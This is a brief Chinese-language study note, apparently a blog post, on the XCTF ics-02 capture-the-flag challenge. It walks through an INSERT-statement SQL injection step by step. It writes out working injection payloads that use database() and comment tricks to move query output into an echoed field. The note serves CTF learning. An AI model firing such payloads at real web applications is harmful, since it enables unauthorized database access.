攻防世界 ics-02 writeup 学习
emmm因为ssrf是对.pdf文件的下载,访问页面不出来的原因,有很大的烦躁,学习了一下writeup。小白一个,那就对注入Poc学习一下吧。
本地sql测试
因为是插入数据的注入,拿了一个表测试,很蠢的照着poc试了一下,非常蠢..
l_name 显示为0....因为poc中的+是python 字符串的连接字符 直接加括号就好了
那么再试试错位到回显位置注入
实战注入测试
1.给txtfirst_name添加单引号 报错'm','y','Esq.','01/10/2019','9786571')' 存在注入
2.猜测sql语句 Inset into XXX values(XX,XX,XX,XX)
3.猜测
insert in to xxx values('1',(database()),/*,'m'*/,'y','Esq.','01/10/2019','9786571')'
注入sql语句为
1',(database()),/*,'m'*/,'
4.由于忘了看回显位置为<p><b>Name: </b>,'y, 1<br />所以调整sql,由txtLast_name来回显
5.newpoc
insert in to xxx values('1','m',(database()),/*,'m','y'*/,'Esq.','01/10/2019','9786571')'
注入sql语句为
1','m',(database()),/*,'m','y'*/,'